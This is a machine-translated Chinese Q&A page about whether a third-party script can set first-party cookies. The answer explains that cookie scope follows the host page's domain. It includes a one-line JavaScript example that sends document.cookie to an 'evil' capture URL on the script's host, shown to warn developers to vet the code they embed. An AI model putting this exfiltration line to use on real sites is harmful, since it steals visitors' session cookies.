第三方脚本是否可以设置第一方cookie
Can a third-party script set a first-party cookie?
我在网上读到了很多关于cookie的内容,但没有解决这个问题:假设我在a.com上有一个服务器,b.com提供的网页在我的服务器上嵌入了一个脚本:
<script src='a.com/script.js'></script>
在设置cookie方面,该脚本可以做什么?它能用domain=a.com
设置cookie吗?我认为是这样,因为脚本是从那个域提供的。由于页面是从该服务器提供的,它是否也可以用domain=b.com
设置cookie?
我试图弄清楚"第一方"answers"第三方"在另一位主持人的网页上调用的脚本中的含义。
我不认为.js文件的来源是相关的。cookie域与正在呈现的文档的域有关。
如果我访问http://www.b.com/
并且它包括
<script src="http://www.a.com/some/file.js"></script>
那么,b.com相信a.com的准则会真诚行事。代码作为正在查看的页面的一部分执行。由于javascript代码将在浏览器中执行,因此它可以从b.com
读取cookie,并通过在文档中创建一个标记来传递数据,src
包含这些数据。
例如,如果.com的javascript文件包含
document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");
然后,恶意的a.com网站管理员可以查看他的网络服务器日志并查看b.com的cookie。
所以,问题是,如果a.com是恶意的,为什么b.com在他们的页面中包含a.com的代码?他们可能没有。作为网络开发人员,我们需要验证我们在网站中嵌入的任何第三方代码的可信度。
相关文章:
- 在jquery中为显示/隐藏设置cookie
- 按下按钮时保存cookie
- 如何在Analytics.js中始终了解最新的cookie过期时间
- php httponly cookie在浏览器关闭时被删除
- 如何在提交表单时将PHP变量传递到Javascript cookie中
- CORS-服务器端cookie没有保存在chrome浏览器上
- 如何为后台更改程序代码设置cookie
- 如何从另一个域加载cookie
- 使用jquery cookie的第三方cookie
- 无法在基于Cordova的应用程序中读取Set Cookie标头
- 如何在Javascript中将单选按钮值保存到cookie中
- cookie加载事件页面重定向
- MVC C#从jQuery和JSON.stringify创建的cookie中读取值
- 为什么可以't我在谷歌浏览器中返回cookie
- 如何使用单选按钮设置cookie值
- PhantomJS(vs nightwatch.js)设置cookie错误
- 如何照顾CSRF&单页应用程序中不使用cookie的XSS攻击
- 未使用Javascript在IE中设置Cookie
- 是一个javascript bookmarklet,可以设置破坏跨域安全的域cookie
- 第三方脚本是否可以设置第一方cookie